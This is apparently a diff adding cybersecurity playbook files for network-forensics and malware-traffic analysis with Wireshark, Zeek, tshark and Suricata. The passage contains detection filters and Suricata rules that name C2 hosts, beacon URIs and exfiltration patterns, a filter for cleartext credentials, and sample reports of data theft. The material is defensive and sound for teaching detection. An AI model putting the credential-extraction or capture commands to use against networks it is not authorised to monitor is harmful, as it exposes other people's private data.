| Type | Value | Context |
|
||||
|------|-------|---------|
|
||||
| | | |
|
||||
|
||||
## Recommendations
|
||||
1.
|
||||
2.
|
||||
3.
|
||||
@@ -0,0 +1,9 @@
|
||||
# Standards Reference - analyzing-network-covert-channels-in-malware
|
||||
|
||||
## Applicable Standards
|
||||
- MITRE ATT&CK Framework
|
||||
- NIST SP 800-83 Guide to Malware Incident Prevention
|
||||
- NIST SP 800-86 Guide to Integrating Forensic Techniques
|
||||
|
||||
## Related MITRE ATT&CK Techniques
|
||||
See SKILL.md for specific technique mappings.
|
||||
@@ -0,0 +1,11 @@
|
||||
# Analysis Workflows - analyzing-network-covert-channels-in-malware
|
||||
|
||||
## Primary Workflow
|
||||
```
|
||||
[Sample Collection] --> [Static Analysis] --> [Dynamic Analysis] --> [IOC Extraction]
|
||||
|
|
||||
v
|
||||
[Report Generation]
|
||||
```
|
||||
|
||||
See SKILL.md for detailed step-by-step procedures.
|
||||
@@ -0,0 +1,252 @@
|
||||
---
|
||||
name: analyzing-network-traffic-for-incidents
|
||||
description: >
|
||||
Analyzes network traffic captures and flow data to identify adversary activity during
|
||||
security incidents, including command-and-control communications, lateral movement,
|
||||
data exfiltration, and exploitation attempts. Uses Wireshark, Zeek, and NetFlow
|
||||
analysis techniques. Activates for requests involving network traffic analysis,
|
||||
packet capture investigation, PCAP analysis, network forensics, C2 traffic detection,
|
||||
or exfiltration detection.
|
||||
domain: cybersecurity
|
||||
subdomain: incident-response
|
||||
tags: [network-forensics, PCAP-analysis, Wireshark, Zeek, traffic-analysis]
|
||||
version: 1.0.0
|
||||
author: mahipal
|
||||
license: MIT
|
||||
---
|
||||
|
||||
# Analyzing Network Traffic for Incidents
|
||||
|
||||
## When to Use
|
||||
|
||||
- SIEM alerts on anomalous network traffic patterns requiring deeper investigation
|
||||
- C2 beaconing is suspected and needs confirmation through packet-level analysis
|
||||
- Data exfiltration volume or destination must be quantified from network evidence
|
||||
- Lateral movement between systems needs to be traced through network connections
|
||||
- An IDS/IPS alert requires packet-level validation to confirm or dismiss
|
||||
|
||||
**Do not use** for host-based forensic analysis (process execution, file system artifacts); use endpoint forensics tools instead.
|
||||
|
||||
## Prerequisites
|
||||
|
||||
- Full packet capture (PCAP) infrastructure or on-demand capture capability (network tap, SPAN port)
|
||||
- Wireshark installed on the analysis workstation with appropriate display filters knowledge
|
||||
- Zeek (formerly Bro) deployed for network metadata generation (conn.log, dns.log, http.log, ssl.log)
|
||||
- NetFlow/IPFIX collection from network devices for traffic flow analysis
|
||||
- Network architecture diagram showing VLAN layout, firewall placement, and monitoring points
|
||||
- Threat intelligence feeds for correlating observed network indicators
|
||||
|
||||
## Workflow
|
||||
|
||||
### Step 1: Capture or Acquire Network Traffic
|
||||
|
||||
Obtain the relevant traffic data for the investigation:
|
||||
|
||||
**Live Capture (if incident is active):**
|
||||
```bash
|
||||
# Capture on specific interface filtering by host
|
||||
tcpdump -i eth0 -w capture.pcap host 10.1.5.42
|
||||
|
||||
# Capture C2 traffic to specific external IP
|
||||
tcpdump -i eth0 -w c2_traffic.pcap host 185.220.101.42
|
||||
|
||||
# Capture with rotation (1GB files, keep 10)
|
||||
tcpdump -i eth0 -w capture_%Y%m%d%H%M.pcap -C 1000 -W 10
|
||||
```
|
||||
|
||||
**From Existing Infrastructure:**
|
||||
- Export PCAP from full packet capture appliance (Arkime/Moloch, ExtraHop, Corelight)
|
||||
- Pull Zeek logs from the Zeek cluster for the investigation timeframe
|
||||
- Export NetFlow data from network devices for high-level traffic analysis
|
||||
|
||||
### Step 2: Identify C2 Communications
|
||||
|
||||
Detect command-and-control traffic patterns:
|
||||
|
||||
**Beaconing Detection (Zeek conn.log):**
|
||||
```bash
|
||||
# Extract connections to external IPs with regular intervals
|
||||
cat conn.log | zeek-cut ts id.orig_h id.resp_h id.resp_p duration orig_bytes resp_bytes \
|
||||
| awk '$4 ~ /^185\.220/' | sort -t. -k1,1n -k2,2n
|
||||
```
|
||||
|
||||
**Wireshark Beacon Analysis:**
|
||||
```
|
||||
# Filter for traffic to suspected C2 IP
|
||||
ip.addr == 185.220.101.42
|
||||
|
||||
# Filter HTTPS traffic to non-standard ports
|
||||
tcp.port != 443 && ssl
|
||||
|
||||
# Filter DNS queries for suspicious domains
|
||||
dns.qry.name contains "evil" or dns.qry.name matches "^[a-z0-9]{32}\."
|
||||
|
||||
# Filter HTTP POST (common C2 check-in method)
|
||||
http.request.method == "POST" && ip.dst == 185.220.101.42
|
||||
```
|
||||
|
||||
Beaconing characteristics to identify:
|
||||
- Regular time intervals between connections (e.g., every 60 seconds with 10-15% jitter)
|
||||
- Consistent packet sizes in requests and responses
|
||||
- HTTPS to external IPs not associated with legitimate CDNs or services
|
||||
- DNS queries with high entropy subdomains (DNS tunneling indicator)
|
||||
|
||||
### Step 3: Analyze Lateral Movement Traffic
|
||||
|
||||
Trace adversary movement between internal systems:
|
||||
|
||||
```
|
||||
Key protocols for lateral movement detection:
|
||||
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
|
||||
SMB (TCP 445): PsExec, file share access, ransomware propagation
|
||||
RDP (TCP 3389): Remote desktop sessions
|
||||
WinRM (TCP 5985): PowerShell remoting
|
||||
WMI (TCP 135): Remote command execution
|
||||
SSH (TCP 22): Linux lateral movement
|
||||
DCE/RPC (TCP 135): DCOM-based lateral movement
|
||||
```
|
||||
|
||||
**Wireshark Filters for Lateral Movement:**
|
||||
```
|
||||
# SMB lateral movement
|
||||
smb2 && ip.src == 10.1.5.42 && ip.dst != 10.1.5.42
|
||||
|
||||
# RDP connections from compromised host
|
||||
tcp.dstport == 3389 && ip.src == 10.1.5.42
|
||||
|
||||
# Kerberos ticket requests (potential pass-the-ticket)
|
||||
kerberos.msg_type == 12 && ip.src == 10.1.5.42
|
||||
|
||||
# NTLM authentication (potential pass-the-hash)
|
||||
ntlmssp.auth.username && ip.src == 10.1.5.42
|
||||
```
|
||||
|
||||
### Step 4: Detect Data Exfiltration
|
||||
|
||||
Identify unauthorized data transfers leaving the network:
|
||||
|
||||
```
|
||||
# Identify large outbound transfers in Zeek conn.log
|
||||
cat conn.log | zeek-cut ts id.orig_h id.resp_h id.resp_p orig_bytes \
|
||||
| awk '$5 > 100000000' | sort -t$'\t' -k5 -rn
|
||||
|
||||
# DNS tunneling detection (high volume of TXT queries)
|
||||
cat dns.log | zeek-cut query qtype | grep TXT | cut -f1 \
|
||||
| rev | cut -d. -f1,2 | rev | sort | uniq -c | sort -rn | head
|
||||
|
||||
# Unusual protocol usage (ICMP tunneling, DNS over HTTPS)
|
||||
cat conn.log | zeek-cut proto id.resp_p orig_bytes | awk '$1 == "icmp" && $3 > 1000'
|
||||
```
|
||||
|
||||
**Wireshark Exfiltration Filters:**
|
||||
```
|
||||
# Large HTTP POST uploads
|
||||
http.request.method == "POST" && tcp.len > 10000
|
||||
|
||||
# FTP data transfers
|
||||
ftp-data && ip.src == 10.0.0.0/8
|
||||
|
||||
# DNS with large TXT responses (tunneling)
|
||||
dns.resp.type == 16 && dns.resp.len > 200
|
||||
```
|
||||
|
||||
### Step 5: Extract and Correlate IOCs
|
||||
|
||||
Pull network-based indicators from traffic analysis:
|
||||
|
||||
- External IP addresses contacted by compromised hosts
|
||||
- Domains resolved via DNS during the incident timeframe
|
||||
- URLs accessed via HTTP/HTTPS (if SSL inspection is in place)
|
||||
- TLS certificate details (subject, issuer, serial number, JA3/JA3S hashes)
|
||||
- User-Agent strings from HTTP requests
|
||||
- File transfers captured in PCAP (extract using Wireshark Export Objects)
|
||||
|
||||
### Step 6: Document Network Forensic Findings
|
||||
|
||||
Compile analysis into a structured report with evidence references:
|
||||
|
||||
- Reference specific PCAP files, frame numbers, and timestamps for each finding
|
||||
- Include packet captures of key evidence as screenshots or exported PDFs
|
||||
- Map network activity to the incident timeline
|
||||
- Correlate network findings with host-based evidence from endpoint forensics
|
||||
|
||||
## Key Concepts
|
||||
|
||||
| Term | Definition |
|
||||
|------|------------|
|
||||
| **PCAP (Packet Capture)** | File format storing raw network packets captured from a network interface for offline analysis |
|
||||
| **Beaconing** | Regular, periodic network connections from a compromised host to a C2 server, identifiable by consistent timing intervals |
|
||||
| **JA3/JA3S** | TLS client and server fingerprinting method based on the ClientHello and ServerHello parameters; unique per application |
|
||||
| **NetFlow/IPFIX** | Network traffic metadata (source, destination, ports, bytes, duration) collected by routers and switches without full packet capture |
|
||||
| **DNS Tunneling** | Technique encoding data in DNS queries and responses to exfiltrate data or maintain C2 through DNS protocol |
|
||||
| **Network Tap** | Hardware device that creates an exact copy of network traffic for monitoring without impacting network performance |
|
||||
| **Zeek Logs** | Structured metadata logs generated by the Zeek network analysis framework covering connections, DNS, HTTP, SSL, and more |
|
||||
|
||||
## Tools & Systems
|
||||
|
||||
- **Wireshark**: Open-source packet analyzer for deep inspection of network protocols at the packet level
|
||||
- **Zeek (formerly Bro)**: Network analysis framework generating structured metadata logs from live or captured traffic
|
||||
- **Arkime (formerly Moloch)**: Open-source full packet capture and search platform for large-scale network forensics
|
||||
- **NetworkMiner**: Network forensic analysis tool for extracting files, images, and credentials from PCAP files
|
||||
- **RITA (Real Intelligence Threat Analytics)**: Open-source beacon detection and DNS tunneling analysis tool for Zeek logs
|
||||
|
||||
## Common Scenarios
|
||||
|
||||
### Scenario: Confirming C2 Beaconing and Quantifying Exfiltration
|
||||
|
||||
**Context**: EDR detects a suspicious process on a workstation but cannot determine the volume of data exfiltrated. Network team provides PCAP from the full packet capture appliance covering the incident timeframe.
|
||||
|
||||
**Approach**:
|
||||
1. Filter PCAP to traffic from the compromised host IP to external destinations
|
||||
2. Identify the C2 channel by analyzing connection timing patterns (beacon detection)
|
||||
3. Extract TLS certificate and JA3 hash from the C2 connection for IOC generation
|
||||
4. Calculate total bytes transferred to C2 infrastructure over the incident duration
|
||||
5. Check for additional exfiltration channels (DNS tunneling, cloud storage uploads)
|
||||
6. Extract any unencrypted files transferred using Wireshark Export Objects feature
|
||||
|
||||
**Pitfalls**:
|
||||
- Analyzing only HTTP traffic when C2 is operating over HTTPS without SSL inspection
|
||||
- Missing DNS tunneling because the data volume per query is small (but total over time is significant)
|
||||
- Not correlating network timestamps with endpoint timestamps (timezone mismatches)
|
||||
- Overlooking legitimate cloud services abused for exfiltration (OneDrive, Google Drive, Dropbox)
|
||||
|
||||
## Output Format
|
||||
|
||||
```
|
||||
NETWORK TRAFFIC ANALYSIS REPORT
|
||||
=================================
|
||||
Incident: INC-2025-1547
|
||||
Analyst: [Name]
|
||||
Capture Source: Arkime full packet capture
|
||||
Analysis Period: 2025-11-15 14:00 UTC - 2025-11-15 18:00 UTC
|
||||
Total PCAP Size: 4.7 GB
|
||||
|
||||
C2 COMMUNICATIONS
|
||||
Source: 10.1.5.42 (WKSTN-042)
|
||||
Destination: 185.220.101.42:443 (HTTPS)
|
||||
Beacon Interval: 60 seconds ± 12% jitter
|
||||
Sessions: 237 connections over 4 hours
|
||||
JA3 Hash: a0e9f5d64349fb13191bc781f81f42e1
|
||||
TLS Certificate: CN=update.evil[.]com (self-signed)
|
||||
Total Data Sent: 147 MB (outbound)
|
||||
Total Data Recv: 2.3 MB (inbound - commands)
|
||||
|
||||
LATERAL MOVEMENT
|
||||
10.1.5.42 → 10.1.10.15 (SMB, TCP 445) - 14:35 UTC
|
||||
10.1.5.42 → 10.1.10.20 (RDP, TCP 3389) - 14:42 UTC
|
||||
10.1.5.42 → 10.1.1.5 (LDAP, TCP 389) - 15:10 UTC
|
||||
|
||||
EXFILTRATION SUMMARY
|
||||
Protocol: HTTPS to C2 server
|
||||
Volume: 147 MB outbound
|
||||
Duration: 14:23 UTC - 18:00 UTC
|
||||
Files Extracted: [list if recoverable from unencrypted channels]
|
||||
|
||||
DNS ANALYSIS
|
||||
Suspicious Queries: 0 DNS tunneling indicators
|
||||
DGA Detection: 0 algorithmically generated domains
|
||||
|
||||
EVIDENCE REFERENCES
|
||||
PCAP File: INC-2025-1547_capture.pcap (SHA-256: ...)
|
||||
Zeek Logs: /logs/zeek/2025-11-15/ (conn.log, ssl.log, dns.log)
|
||||
```
|
||||
@@ -0,0 +1,324 @@
|
||||
---
|
||||
name: analyzing-network-traffic-of-malware
|
||||
description: >
|
||||
Analyzes network traffic generated by malware during sandbox execution or live incident
|
||||
response to identify C2 protocols, data exfiltration channels, payload downloads, and
|
||||
lateral movement patterns using Wireshark, Zeek, and Suricata. Activates for requests
|
||||
involving malware network analysis, C2 traffic decoding, malware PCAP analysis, or
|
||||
network-based malware detection.
|
||||
domain: cybersecurity
|
||||
subdomain: malware-analysis
|
||||
tags: [malware, network-analysis, PCAP, Wireshark, C2-detection]
|
||||
version: 1.0.0
|
||||
author: mahipal
|
||||
license: MIT
|
||||
---
|
||||
|
||||
# Analyzing Network Traffic of Malware
|
||||
|
||||
## When to Use
|
||||
|
||||
- Sandbox execution has captured a PCAP file and the network behavior needs detailed analysis
|
||||
- Identifying the C2 protocol structure for writing network detection signatures
|
||||
- Determining what data the malware exfiltrates and to which external infrastructure
|
||||
- Analyzing DNS tunneling, domain generation algorithms (DGA), or fast-flux behavior
|
||||
- Creating Suricata/Snort signatures based on observed malware network patterns
|
||||
|
||||
**Do not use** for host-based analysis of malware behavior; use Cuckoo sandbox reports or Volatility memory analysis for process-level activity.
|
||||
|
||||
## Prerequisites
|
||||
|
||||
- Wireshark 4.x installed for interactive PCAP analysis
|
||||
- tshark (Wireshark CLI) for scripted packet extraction
|
||||
- Zeek installed for automated metadata generation from PCAPs
|
||||
- Suricata with ET Open/ET Pro rulesets for signature matching
|
||||
- NetworkMiner for file extraction and credential detection from PCAPs
|
||||
- Python 3.8+ with `scapy` and `dpkt` for programmatic packet analysis
|
||||
|
||||
## Workflow
|
||||
|
||||
### Step 1: Initial PCAP Overview
|
||||
|
||||
Get a high-level understanding of the network traffic:
|
||||
|
||||
```bash
|
||||
# Capture statistics
|
||||
capinfos malware.pcap
|
||||
|
||||
# Protocol hierarchy
|
||||
tshark -r malware.pcap -q -z io,phs
|
||||
|
||||
# Endpoint statistics (top talkers)
|
||||
tshark -r malware.pcap -q -z endpoints,ip
|
||||
|
||||
# Conversation statistics
|
||||
tshark -r malware.pcap -q -z conv,tcp
|
||||
|
||||
# DNS query summary
|
||||
tshark -r malware.pcap -q -z dns,tree
|
||||
```
|
||||
|
||||
### Step 2: Analyze DNS Activity
|
||||
|
||||
Examine DNS queries for DGA, tunneling, or C2 domain resolution:
|
||||
|
||||
```bash
|
||||
# Extract all DNS queries
|
||||
tshark -r malware.pcap -T fields -e frame.time -e dns.qry.name -e dns.a \
|
||||
-Y "dns.flags.response == 1" | sort
|
||||
|
||||
# Detect DGA patterns (high entropy domain names)
|
||||
python3 << 'PYEOF'
|
||||
import math
|
||||
from collections import Counter
|
||||
|
||||
def entropy(s):
|
||||
p = [n/len(s) for n in Counter(s).values()]
|
||||
return -sum(pi * math.log2(pi) for pi in p if pi > 0)
|
||||
|
||||
# Parse DNS queries from tshark output
|
||||
import subprocess
|
||||
result = subprocess.run(
|
||||
["tshark", "-r", "malware.pcap", "-T", "fields", "-e", "dns.qry.name",
|
||||
"-Y", "dns.flags.response == 0"],
|
||||
capture_output=True, text=True
|
||||
)
|
||||
|
||||
domains = set(result.stdout.strip().split('\n'))
|
||||
print("Suspicious DNS queries (high entropy):")
|
||||
for domain in domains:
|
||||
if domain:
|
||||
subdomain = domain.split('.')[0]
|
||||
ent = entropy(subdomain)
|
||||
if ent > 3.5 and len(subdomain) > 10:
|
||||
print(f" {domain} (entropy: {ent:.2f})")
|
||||
PYEOF
|
||||
|
||||
# Detect DNS tunneling (large TXT responses)
|
||||
tshark -r malware.pcap -T fields -e dns.qry.name -e dns.txt \
|
||||
-Y "dns.resp.type == 16 and dns.resp.len > 100"
|
||||
```
|
||||
|
||||
### Step 3: Analyze HTTP/HTTPS C2 Communication
|
||||
|
||||
Examine web-based command-and-control traffic:
|
||||
|
||||
```bash
|
||||
# Extract HTTP requests
|
||||
tshark -r malware.pcap -T fields \
|
||||
-e frame.time -e ip.src -e ip.dst -e http.host \
|
||||
-e http.request.method -e http.request.uri -e http.user_agent \
|
||||
-Y "http.request"
|
||||
|
||||
# Extract HTTP response bodies (potential payload downloads)
|
||||
tshark -r malware.pcap -T fields \
|
||||
-e http.host -e http.request.uri -e http.content_type -e tcp.len \
|
||||
-Y "http.response and tcp.len > 1000"
|
||||
|
||||
# Extract POST data (potential exfiltration)
|
||||
tshark -r malware.pcap -T fields \
|
||||
-e http.host -e http.request.uri -e http.file_data \
|
||||
-Y "http.request.method == POST"
|
||||
|
||||
# TLS analysis (SNI, JA3 fingerprints)
|
||||
tshark -r malware.pcap -T fields \
|
||||
-e tls.handshake.extensions_server_name \
|
||||
-e tls.handshake.ja3 \
|
||||
-Y "tls.handshake.type == 1"
|
||||
|
||||
# Extract TLS certificate details
|
||||
tshark -r malware.pcap -T fields \
|
||||
-e x509ce.dNSName -e x509af.serialNumber \
|
||||
-e x509sat.utf8String \
|
||||
-Y "tls.handshake.type == 11"
|
||||
|
||||
# Export HTTP objects (downloaded files)
|
||||
tshark -r malware.pcap --export-objects http,exported_files/
|
||||
```
|
||||
|
||||
### Step 4: Detect Beaconing Patterns
|
||||
|
||||
Identify regular periodic communication indicating C2 beaconing:
|
||||
|
||||
```python
|
||||
# Beacon detection from PCAP
|
||||
from scapy.all import rdpcap, IP, TCP
|
||||
from collections import defaultdict
|
||||
import statistics
|
||||
|
||||
packets = rdpcap("malware.pcap")
|
||||
|
||||
# Group connections by destination IP:port
|
||||
connections = defaultdict(list)
|
||||
for pkt in packets:
|
||||
if IP in pkt and TCP in pkt:
|
||||
if pkt[TCP].flags & 0x02: # SYN flag
|
||||
dst = f"{pkt[IP].dst}:{pkt[TCP].dport}"
|
||||
connections[dst].append(float(pkt.time))
|
||||
|
||||
# Analyze timing intervals for beaconing
|
||||
print("Beacon Analysis:")
|
||||
for dst, times in connections.items():
|
||||
if len(times) >= 5:
|
||||
intervals = [times[i+1] - times[i] for i in range(len(times)-1)]
|
||||
avg = statistics.mean(intervals)
|
||||
stdev = statistics.stdev(intervals) if len(intervals) > 1 else 0
|
||||
jitter = (stdev / avg * 100) if avg > 0 else 0
|
||||
|
||||
if 10 < avg < 3600 and jitter < 30: # Regular interval with < 30% jitter
|
||||
print(f" [!] {dst}: {len(times)} connections")
|
||||
print(f" Interval: {avg:.1f}s ± {stdev:.1f}s (jitter: {jitter:.1f}%)")
|
||||
print(f" Pattern: LIKELY BEACONING")
|
||||
```
|
||||
|
||||
### Step 5: Generate Network Detection Signatures
|
||||
|
||||
Create Suricata/Snort rules from observed traffic patterns:
|
||||
|
||||
```bash
|
||||
# Run Suricata against the PCAP for existing signature matches
|
||||
suricata -r malware.pcap -l suricata_output/ -c /etc/suricata/suricata.yaml
|
||||
|
||||
# Review alerts
|
||||
cat suricata_output/fast.log
|
||||
|
||||
# Create custom Suricata rule from observed patterns
|
||||
cat << 'EOF' > custom_malware.rules
|
||||
# C2 beacon detection based on observed URI pattern
|
||||
alert http $HOME_NET any -> $EXTERNAL_NET any (
|
||||
msg:"MALWARE MalwareX C2 Beacon";
|
||||
flow:established,to_server;
|
||||
http.method; content:"POST";
|
||||
http.uri; content:"/gate.php?id=";
|
||||
http.user_agent; content:"Mozilla/5.0 (compatible; MSIE 10.0)";
|
||||
sid:9000001; rev:1;
|
||||
)
|
||||
|
||||
# DNS query for known C2 domain
|
||||
alert dns $HOME_NET any -> any any (
|
||||
msg:"MALWARE MalwareX C2 DNS Query";
|
||||
dns.query; content:"update.malicious.com";
|
||||
sid:9000002; rev:1;
|
||||
)
|
||||
|
||||
# JA3 hash match for malware TLS client
|
||||
alert tls $HOME_NET any -> $EXTERNAL_NET any (
|
||||
msg:"MALWARE MalwareX JA3 Match";
|
||||
ja3.hash; content:"a0e9f5d64349fb13191bc781f81f42e1";
|
||||
sid:9000003; rev:1;
|
||||
)
|
||||
EOF
|
||||
```
|
||||
|
||||
### Step 6: Extract Files and Artifacts from Traffic
|
||||
|
||||
Recover transferred files and embedded data:
|
||||
|
||||
```bash
|
||||
# Extract files using Zeek
|
||||
zeek -r malware.pcap /opt/zeek/share/zeek/policy/frameworks/files/extract-all-files.zeek
|
||||
ls extract_files/
|
||||
|
||||
# Extract files using NetworkMiner (GUI)
|
||||
# Or use tshark for specific protocol exports
|
||||
tshark -r malware.pcap --export-objects http,http_objects/
|
||||
tshark -r malware.pcap --export-objects smb,smb_objects/
|
||||
tshark -r malware.pcap --export-objects tftp,tftp_objects/
|
||||
|
||||
# Hash all extracted files
|
||||
sha256sum http_objects/* smb_objects/* 2>/dev/null
|
||||
|
||||
# Generate Zeek logs for comprehensive metadata
|
||||
zeek -r malware.pcap
|
||||
# Output: conn.log, dns.log, http.log, ssl.log, files.log, etc.
|
||||
```
|
||||
|
||||
## Key Concepts
|
||||
|
||||
| Term | Definition |
|
||||
|------|------------|
|
||||
| **Beaconing** | Regular periodic connections from malware to C2 server, identifiable by consistent time intervals and packet sizes |
|
||||
| **JA3/JA3S** | TLS fingerprinting method creating a hash from ClientHello/ServerHello parameters to uniquely identify malware TLS implementations |
|
||||
| **DGA (Domain Generation Algorithm)** | Algorithm generating pseudo-random domain names that malware queries to locate C2 servers, evading static domain blocklists |
|
||||
| **DNS Tunneling** | Encoding data in DNS queries and responses to establish a C2 channel or exfiltrate data through DNS infrastructure |
|
||||
| **Fast Flux** | DNS technique rapidly rotating IP addresses for a domain to avoid takedown and distribute C2 across many compromised hosts |
|
||||
| **SNI (Server Name Indication)** | TLS extension revealing the hostname the client is connecting to; visible even in encrypted HTTPS connections |
|
||||
| **Network Signature** | Suricata/Snort rule matching specific patterns in network traffic (headers, payloads, timing) to detect malicious communications |
|
||||
|
||||
## Tools & Systems
|
||||
|
||||
- **Wireshark**: Open-source packet analyzer for deep interactive inspection of network traffic at the protocol level
|
||||
- **Zeek**: Network analysis framework generating structured metadata logs (conn, dns, http, ssl) from live or captured traffic
|
||||
- **Suricata**: High-performance network IDS/IPS for signature-based detection with Lua scripting for custom detection logic
|
||||
- **NetworkMiner**: Network forensic analysis tool for extracting files, images, and credentials from PCAP files
|
||||
- **Scapy**: Python packet manipulation library for programmatic packet analysis, beacon detection, and protocol decoding
|
||||
|
||||
## Common Scenarios
|
||||
|
||||
### Scenario: Decoding a Custom Binary C2 Protocol
|
||||
|
||||
**Context**: Malware communicates with its C2 server using a custom binary protocol over TCP port 8443. Standard HTTP analysis yields no results. The protocol structure needs to be reverse engineered from the PCAP.
|
||||
|
||||
**Approach**:
|
||||
1. Filter the PCAP for TCP port 8443 conversations and follow the TCP stream
|
||||
2. Identify the message framing (length prefix, delimiter, fixed-size headers)
|
||||
3. Compare multiple messages to identify static header fields vs variable data fields
|
||||
4. Cross-reference with reverse engineering findings from Ghidra (if the binary was analyzed)
|
||||
5. Write a Wireshark dissector or Scapy parser for the custom protocol
|
||||
6. Create Suricata rules matching the static header bytes for network detection
|
||||
7. Document the full protocol specification for threat intelligence sharing
|
||||
|
||||
**Pitfalls**:
|
||||
- Analyzing only the first few packets; some C2 protocols change behavior after initial handshake
|
||||
- Not decrypting TLS traffic when the sandbox has MITM capabilities
|
||||
- Confusing legitimate CDN or cloud traffic with C2 (validate destination IPs)
|
||||
- Missing C2 traffic that uses DNS or ICMP instead of TCP/UDP
|
||||
|
||||
## Output Format
|
||||
|
||||
```
|
||||
MALWARE NETWORK TRAFFIC ANALYSIS
|
||||
===================================
|
||||
PCAP File: malware_sandbox.pcap
|
||||
Duration: 300 seconds
|
||||
Total Packets: 12,847
|
||||
Total Bytes: 4.2 MB
|
||||
|
||||
DNS ACTIVITY
|
||||
Total Queries: 47
|
||||
DGA Detected: Yes (23 high-entropy queries to .com TLD)
|
||||
Tunneling: No
|
||||
Resolved C2: update.malicious[.]com -> 185.220.101[.]42
|
||||
|
||||
C2 COMMUNICATION
|
||||
Protocol: HTTPS (TLS 1.2)
|
||||
Server: 185.220.101[.]42:443
|
||||
SNI: update.malicious[.]com
|
||||
JA3 Hash: a0e9f5d64349fb13191bc781f81f42e1
|
||||
Beacon Interval: 60.2s ± 6.8s (11.3% jitter)
|
||||
Total Sessions: 237
|
||||
Data Sent: 147 MB
|
||||
Data Received: 2.3 MB
|
||||
Certificate: CN=update.malicious[.]com (self-signed, expired)
|
||||
|
||||
PAYLOAD DOWNLOADS
|
||||
GET /payload.dll from compromised-site[.]com
|
||||
Size: 98,304 bytes
|
||||
SHA-256: abc123def456...
|
||||
Content-Type: application/octet-stream
|
||||
|
||||
EXFILTRATION
|
||||
Method: HTTPS POST to /gate.php
|
||||
Content-Type: application/octet-stream
|
||||
Average Size: 15,432 bytes per request
|
||||
Total Volume: 147 MB over 4 hours
|
||||
|
||||
SURICATA ALERTS
|
||||
[1:2028401] ET MALWARE Generic C2 Beacon Pattern
|
||||
[1:2028500] ET POLICY Self-Signed Certificate
|
||||
|
||||
GENERATED SIGNATURES
|
||||
SID 9000001: MalwareX HTTP beacon pattern
|
||||
SID 9000002: MalwareX DNS C2 domain
|
||||
SID 9000003: MalwareX JA3 TLS fingerprint
|
||||
```
|
||||
@@ -0,0 +1,218 @@
|
||||
---
|
||||
name: analyzing-network-traffic-with-wireshark
|
||||
description: >
|
||||
Captures and analyzes network packet data using Wireshark and tshark to identify
|
||||
malicious traffic patterns, diagnose protocol issues, extract artifacts, and
|
||||
support incident response investigations on authorized network segments.
|
||||
domain: cybersecurity
|
||||
subdomain: network-security
|
||||
tags: [network-security, wireshark, packet-analysis, traffic-analysis, pcap]
|
||||
version: "1.0"
|
||||
author: mahipal
|
||||
license: MIT
|
||||
---
|
||||
# Analyzing Network Traffic with Wireshark
|
||||
|
||||
## When to Use
|
||||
|
||||
- Investigating suspected network intrusions by examining packet-level evidence of command-and-control traffic, data exfiltration, or lateral movement
|
||||
- Diagnosing network performance issues such as retransmissions, fragmentation, or DNS resolution failures
|
||||
- Analyzing malware communication patterns by capturing traffic from sandboxed or isolated hosts
|
||||
- Validating firewall and IDS rules by confirming what traffic is actually traversing network segments
|
||||
- Extracting files, credentials, or indicators of compromise from captured network sessions
|
||||
|
||||
**Do not use** to capture traffic on networks without authorization, to intercept private communications without legal authority, or as a substitute for full-featured SIEM platforms in production monitoring.
|
||||
|
||||
## Prerequisites
|
||||
|
||||
- Wireshark 4.0+ and tshark command-line utility installed
|
||||
- Root/sudo privileges or membership in the `wireshark` group for live packet capture
|
||||
- Network interface access (physical NIC, span port, or network tap) to the monitored segment
|
||||
- Sufficient disk space for packet capture files (estimate 1 GB per minute on busy gigabit links)
|
||||
- Familiarity with TCP/IP protocols, HTTP, DNS, TLS, and SMB at the packet level
|
||||
|
||||
## Workflow
|
||||
|
||||
### Step 1: Configure Capture Environment
|
||||
|
||||
Set up the capture interface and filters to target relevant traffic:
|
||||
|
||||
```bash
|
||||
# List available interfaces
|
||||
tshark -D
|
||||
|
||||
# Start capture on eth0 with a capture filter to limit scope
|
||||
tshark -i eth0 -f "host 10.10.5.23 and (port 80 or port 443 or port 445)" -w /tmp/capture.pcapng
|
||||
|
||||
# Capture with ring buffer to manage disk usage (10 files, 100MB each)
|
||||
tshark -i eth0 -b filesize:102400 -b files:10 -w /tmp/rolling_capture.pcapng
|
||||
|
||||
# Capture on multiple interfaces simultaneously
|
||||
tshark -i eth0 -i eth1 -w /tmp/multi_interface.pcapng
|
||||
```
|
||||
|
||||
For Wireshark GUI, set capture filter in the Capture Options dialog before starting.
|
||||
|
||||
### Step 2: Apply Display Filters for Targeted Analysis
|
||||
|
||||
```bash
|
||||
# Filter HTTP traffic containing suspicious user agents
|
||||
tshark -r capture.pcapng -Y "http.user_agent contains \"curl\" or http.user_agent contains \"Wget\""
|
||||
|
||||
# Find DNS queries to suspicious TLDs
|
||||
tshark -r capture.pcapng -Y "dns.qry.name contains \".xyz\" or dns.qry.name contains \".top\" or dns.qry.name contains \".tk\""
|
||||
|
||||
# Identify TCP retransmissions indicating network issues
|
||||
tshark -r capture.pcapng -Y "tcp.analysis.retransmission"
|
||||
|
||||
# Filter SMB traffic for lateral movement detection
|
||||
tshark -r capture.pcapng -Y "smb2.cmd == 5 or smb2.cmd == 3" -T fields -e ip.src -e ip.dst -e smb2.filename
|
||||
|
||||
# Find cleartext credential transmission
|
||||
tshark -r capture.pcapng -Y "ftp.request.command == \"PASS\" or http.authbasic"
|
||||
|
||||
# Detect beaconing patterns (regular interval connections)
|
||||
tshark -r capture.pcapng -Y "ip.dst == 203.0.113.50" -T fields -e frame.time_relative -e ip.src -e tcp.dstport
|
||||
```
|
||||
|
||||
### Step 3: Protocol-Specific Deep Analysis
|
||||
|
||||
```bash
|
||||
# Follow a TCP stream to reconstruct a conversation
|
||||
tshark -r capture.pcapng -q -z follow,tcp,ascii,0
|
||||
|
||||
# Analyze HTTP request/response pairs
|
||||
tshark -r capture.pcapng -Y "http" -T fields -e frame.time -e ip.src -e ip.dst -e http.request.method -e http.request.uri -e http.response.code
|
||||
|
||||
# Extract DNS query/response statistics
|
||||
tshark -r capture.pcapng -q -z dns,tree
|
||||
|
||||
# Analyze TLS handshakes for weak cipher suites
|
||||
tshark -r capture.pcapng -Y "tls.handshake.type == 2" -T fields -e ip.src -e ip.dst -e tls.handshake.ciphersuite
|
||||
|
||||
# SMB file access enumeration
|
||||
tshark -r capture.pcapng -Y "smb2" -T fields -e frame.time -e ip.src -e ip.dst -e smb2.filename -e smb2.cmd
|
||||
```
|
||||
|
||||
### Step 4: Extract Artifacts and IOCs
|
||||
|
||||
```bash
|
||||
# Export HTTP objects (files transferred over HTTP)
|
||||
tshark -r capture.pcapng --export-objects http,/tmp/http_objects/
|
||||
|
||||
